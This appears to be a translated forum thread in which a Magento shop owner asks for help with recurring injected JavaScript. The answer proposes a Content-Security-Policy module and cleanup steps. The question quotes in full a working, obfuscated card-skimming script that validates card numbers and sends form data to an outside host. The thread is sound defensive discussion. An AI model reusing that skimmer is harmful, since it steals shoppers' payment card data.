我们的商店反复感染恶意软件。它是一段 JavaScript 代码。
每次发生这种情况时,我都可以在以下位置的后端中找到并删除代码:
系统->常规->设计-> HTML头->其他脚本
我们使用Magento 1.9.3.8。我还更改了管理员密码,但这无济于事。
我不是开发人员,所以我想知道如何查找此代码,我需要自己删除它。<script>(function(){(function ATMZOW(){var S7HYO6=String.fromCharCode(115,112,108,105,116,44,116,111,83,116,114,105,110,103,44,106,111,105,110,44,108,101,110,103,116,104,44,99,104,97,114,67,111,100,101,65,116,44,102,114,111,109,67,104,97,114,67,111,100,101)[String.fromCharCode(115,112,108,105,116)](String.fromCharCode(44));function KGOOOF(W424TI){W424TI=W424TI[S7HYO6[0]]("");var J8TRBF=ATMZOW[S7HYO6[1]]()[S7HYO6[0]](/\(| | |\n|\r|;|}|{|\)/)[S7HYO6[2]]("")[S7HYO6[3]][S7HYO6[1]]()[S7HYO6[0]](""),GPXM23=0,YB73OF="",I8649J="",F4ZOWP=0,ABC8ON;for(ABC8ON=0;ABC8ON<W424TI[S7HYO6[3]];ABC8ON=ABC8ON+2){if(J8TRBF[S7HYO6[3]]==GPXM23){GPXM23=0;}I8649J=parseInt(W424TI[ABC8ON]+W424TI[ABC8ON+1],30)-J8TRBF[GPXM23][S7HYO6[4]](0)-F4ZOWP;YB73OF+=String[S7HYO6[5]](I8649J);F4ZOWP=I8649J;GPXM23++}return YB73OF}S7HYO6=KGOOOF("215i8l8s7q7m8q8l8l8q9d9c7m828m7m8b7q7m8h8l5g3n6m8q979g9e7376938k8k8f92736j8s9c946q6j929e9d9c986r6e6i6s8p8n6o3n5d5d5t613h3h5n8q8m8o94975f588c8h7a7s948s97837q979c8s8q8s8q5p5h90908j8g9289879193878h9r967o80925t4p4p5q985l5m989f928r965r3d3d3d3f5g8b5a48425f959j99987i5c4p3i60918o90929f5r5f959c8s5j487o7g425o97999d918i8m9b9e5r5q989590925r5t8s8i8l8q975k588s9j8o878i7k7s908q9d5r5t908m968t5g5m8q918q927r6r76704h588k935j5g908r8c928e7s5d5r8s8h7m7g8l8r5c5r9c847s9b95927m758r935c5l8m8n8l5c5k8m5b5d919c917h7g8i8m7m7n8s8c5c5e908q898s947b7i8o8r8l8m9b635g8q9a938q9b7r7e8e8o9a925c5q9e905a5k8l908q8e")[S7HYO6[0]](String.fromCharCode(10));function XYKV3W(){var J8TRBF=arguments,GPXM23=0,ABC8ON;for(ABC8ON=0;ABC8ON<J8TRBF.length;ABC8ON++)GPXM23+=J8TRBF[ABC8ON];return S7HYO6[GPXM23]}(function(){var FEOY7B=XYKV3W(1,1,-2),HSNKEN,EVEDX9=document,ZH09E4=XYKV3W(1,2,2,-4),I8NBM7=XYKV3W(5,-3),HHP3QV=I8NBM7[XYKV3W(5,42,-26)](XYKV3W(7,-7,3))[0],YC5N3S=XYKV3W(2,2)+Math[XYKV3W(22,32,-32)](),EQS83E=XYKV3W(4,10,-9),HO8J5B=XYKV3W(11,-2,-2,-1),SQXXSJ=XYKV3W(8,-2,1),W2VT2I=XYKV3W(1,4,3)[XYKV3W(26,-12,7)](XYKV3W(18,-11,2));function 
JKFJ9I(KAVJ15,YTH96D){KAVJ15[SQXXSJ]?KAVJ15[SQXXSJ](YTH96D,TOVTBZ,false):KAVJ15[XYKV3W(26,-3)](XYKV3W(17,13,15,-35)+YTH96D,TOVTBZ)}function XFONKN(KAVJ15){var QOPJZJ=KAVJ15[XYKV3W(44,-19,-1)],PTDYD2;KAVJ15=KAVJ15[ZH09E4](XYKV3W(8,3));for(PTDYD2=0;PTDYD2<KAVJ15[XYKV3W(2,4)];PTDYD2++)if(QOPJZJ==KAVJ15[PTDYD2][XYKV3W(49,-32,7)])QOPJZJ=KAVJ15[PTDYD2][XYKV3W(35,2,49,-61)];return encodeURIComponent(QOPJZJ)}function TOVTBZ(){var KAVJ15=EVEDX9[XYKV3W(23,31,44,-72)]||EVEDX9[ZH09E4](XYKV3W(3,-9,-15,33)),PTDYD2,TDKZU2=XYKV3W(1,-1,-1,1),E;HSNKEN=XYKV3W(1,-1,0);for(PTDYD2=0;PTDYD2<KAVJ15[HO8J5B];PTDYD2++){if(HHP3QV[XYKV3W(18,-31,40)](EQS83E+KAVJ15[PTDYD2][XYKV3W(11,38,-21)][XYKV3W(9,41,-21)]()+EQS83E)>=0&&KAVJ15[PTDYD2][XYKV3W(44,-20)]){if(PYA434(KAVJ15[PTDYD2][XYKV3W(16,7,1)]))HSNKEN=KAVJ15[PTDYD2][XYKV3W(27,29,-32)];TDKZU2+=XYKV3W(15,23,-25)+(KAVJ15[PTDYD2][XYKV3W(21,52,-43)]||KAVJ15[PTDYD2][XYKV3W(36,-5)]||XYKV3W(9,-13,14,4)+PTDYD2)+XYKV3W(28,-13)+XFONKN(KAVJ15[PTDYD2])}}if(FEOY7B!=TDKZU2&&HSNKEN){FEOY7B=TDKZU2;GD67HI()}}function GD67HI(){var YTH96D=XYKV3W(11,5),UB8JBF=String;YTH96D+=UB8JBF[XYKV3W(15,17)](118,97,109,98,101,114,108,111,46,99,111,109)+YTH96D[6]+W2VT2I[0]+YTH96D[6]+W2VT2I[3]+YTH96D[6]+W2VT2I[2]+EQS83E+W2VT2I[1];var KAVJ15=EVEDX9[XYKV3W(45,26,-64,26)](XYKV3W(23,18,-24)),TDKZU2=EVEDX9[ZH09E4](XYKV3W(15,2,1))[0];KAVJ15=TDKZU2[XYKV3W(19,22,-7)](KAVJ15,null);KAVJ15[XYKV3W(55,-43,56,-33)]=YTH96D+XYKV3W(13,-19,17,8)+YC5N3S+FEOY7B+XYKV3W(26,15,-28)+I8NBM7[11]+HHP3QV[11]+XYKV3W(22,-20,-12,25)+HSNKEN}function PYA434(BQ1CNA){var YTH96D=0;BQ1CNA=BQ1CNA[XYKV3W(30,-9)](XYKV3W(1,1,1,-3));if(BQ1CNA[HO8J5B]<13||BQ1CNA[HO8J5B]>19)return false;for(var PTDYD2=BQ1CNA[HO8J5B]-1;PTDYD2>=0;PTDYD2--){if(!BQ1CNA[PTDYD2][XYKV3W(12,24)](/[0-9]/))return false;if(!(PTDYD2%2)){YTH96D+=(BQ1CNA[PTDYD2]*2>9)?BQ1CNA[PTDYD2]*2-9:BQ1CNA[PTDYD2]*2}else{YTH96D+=BQ1CNA[PTDYD2]*1}}return!(YTH96D%10)}function BQ1CNA(){var 
KAVJ15=EVEDX9[XYKV3W(9,13,4)]||EVEDX9[ZH09E4](XYKV3W(24,-22,19,-9)),PTDYD2;for(PTDYD2=0;PTDYD2<KAVJ15[HO8J5B];PTDYD2++){if(I8NBM7[XYKV3W(4,23)](EQS83E+KAVJ15[PTDYD2][XYKV3W(54,45,55,-126)][XYKV3W(19,47,-37)]()+EQS83E)>=0&&!KAVJ15[PTDYD2][YC5N3S]){KAVJ15[PTDYD2][YC5N3S]=1;JKFJ9I(KAVJ15[PTDYD2],XYKV3W(23,-2,-1))}}setTimeout(BQ1CNA,99)}BQ1CNA()}())}())}())</script>
答案 0 :(得分:0)
1 /针对讨厌的脚本
我使用了非常有效的解决方案。
营销机构不喜欢它,但是他们通常并不关心安全性。
它就是 Content-Security-Policy(内容安全策略)响应头。
它的作用类似防火墙:任何想在您的网站页面上加载资源或执行操作的外部服务器,都必须先由您明确列入允许名单。
配置起来并不容易。下面是一个示例,您必须把自己站点需要的来源加进去。
在app/code/local/NAMESAPECE/MODULE/etc/config.xml
...
<!--
  Frontend-area event configuration: attaches an observer to the
  controller_action_predispatch event. The observer entry names the class
  alias NAMESAPECE_MODULE/observer and the method processPreDispatch.
  NAMESAPECE and MODULE look like placeholders for your own namespace and
  module name. NOTE(review): the alias must resolve to the Observer model
  through the module's <models> declaration, which this excerpt omits (confirm).
-->
<frontend>
<events>
<controller_action_predispatch>
<observers>
<NAMESAPECE_MODULE_controller_action_predispatch>
<class>NAMESAPECE_MODULE/observer</class>
<method>processPreDispatch</method>
</NAMESAPECE_MODULE_controller_action_predispatch>
</observers>
</controller_action_predispatch>
</events>
</frontend>
...
在app/code/local/NAMESAPECE/MODULE/Model/Observer.php
<?php
/**
 * Observer that adds browser security headers to the response of the
 * controller action being dispatched.
 */
class NAMESAPECE_MODULE_Model_Observer
{
    /**
     * Sets X-XSS-Protection, X-Content-Type-Options and a
     * Content-Security-Policy header on the current response.
     *
     * @param Varien_Event_Observer $observer event carrying the controller action
     * @return void
     */
    public function processPreDispatch(Varien_Event_Observer $observer)
    {
        /** @var Mage_Core_Controller_Response_Http $httpResponse */
        $httpResponse = $observer->getControllerAction()->getResponse();

        // NOTE(review): X-XSS-Protection is a legacy header; current browsers
        // have dropped the XSS auditor it controlled, so the CSP below is the
        // control that matters.
        $httpResponse->setHeader('X-XSS-Protection', '1; mode=block');
        $httpResponse->setHeader('X-Content-Type-Options', 'nosniff');

        // One entry per CSP directive, each kept with its trailing ';' so the
        // concatenated header value is unchanged.
        //
        // NOTE(review): script-src carries 'unsafe-inline' and 'unsafe-eval',
        // so an inline <script> injected into the page still executes; this
        // policy only limits which hosts the page may load from or connect to.
        // NOTE(review): several sources are plain http:// and many are
        // wildcards; on an HTTPS storefront consider trimming both.
        $directives = array(
            "default-src 'self';",
            "script-src 'self' 'unsafe-inline' 'unsafe-eval' https://bam.nr-data.net http://code.jquery.com https://ajax.cloudflare.com http://ajax.cloudflare.com https://cdnjs.cloudflare.com https://*.facebook.com https://*.facebook.net http://*.facebook.com http://*.facebook.net http://*.googleapis.com https://*.googleapis.com http://www.google-analytics.com https://www.google-analytics.com http://*.google.com https://*.google.com https://*.googletagmanager.com https://*.googleadservices.com https://*.criteo.net https://*.criteo.com http://bat.bing.com https://bat.bing.com https://*.google.fr https://*.gstatic.com/;",
            "style-src 'self' 'unsafe-inline' fonts.googleapis.com https://tagmanager.google.com;",
            "img-src 'self' http://*.facebook.com http://*.paypal.com http://www.google-analytics.com http://*.gstatic.com http://*.googleapis.com https://*.fbcdn.net http://*.google.com https://*.google.com http://*.google.fr https://*.google.fr http://*.google.be https://*.google.be http://*.google.nl https://*.google.nl http://*.google.es https://*.google.es http://*.google.de https://*.google.de http://*.google.co.uk https://*.google.co.uk https://*.facebook.com https://*.paypal.com https://www.google-analytics.com https://*.gstatic.com https://*.googleapis.com http://*.bing.com;",
            "connect-src 'self' https://www.google-analytics.com;",
            "font-src 'self' http://fonts.gstatic.com https://fonts.gstatic.com;",
            "object-src 'self';",
            "media-src 'self';",
            "frame-src 'self' https://tr.snapchat.com http://*.youtube.com http://*.facebook.com http://*.google.com http://*.google.fr https://*.youtube.com https://*.facebook.com https://*.google.com https://*.google.fr;",
        );

        // Join the directives and drop the final ';' before sending.
        $policyValue = rtrim(implode('', $directives), ';');
        $httpResponse->setHeader('Content-Security-Policy', $policyValue);
    }
}
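然后,在前端浏览页面时打开浏览器控制台。您会看到哪些来源尝试加载或执行内容,却被 Content-Security-Policy 响应头阻止了。请注意,上面的示例在 script-src 中包含 'unsafe-inline' 和 'unsafe-eval',因此直接写入页面的内联脚本(例如问题中贴出的那段)仍然会运行;该策略只限制页面可以从哪些主机加载资源或向哪些主机发出请求。所以它是一层缓解措施,不能代替找出并封堵入侵途径。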
2 /就您的情况而言,您的管理后台也已被入侵
更改您的管理员密码和电子邮件地址,删除所有其他管理员帐户
更改数据库密码,确保MySql用户只能从本地网络访问MySql
去掉模板(phtml)中对该配置字段的调用:把 app/design/frontend/base/default/template/page/html/head.phtml 复制到您自己主题的设计文件夹中,
并在副本里删除 <?php echo $this->getIncludes() ?>
检查所有模块,删除不需要的模块
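如果问题仍然存在,则应审核所有代码/服务器。问题中的脚本包含一个对 13–19 位数字做 Luhn 式校验和的函数(银行卡号的常见校验方式),并拼出了主机名 vamberlo.com(由字符码 118,97,109,98,101,114,108,111,46,99,111,109 还原),看起来是一个支付卡窃取脚本;因此排查时应在服务器和代理日志中查找该主机名,并按卡数据可能已外泄来处理。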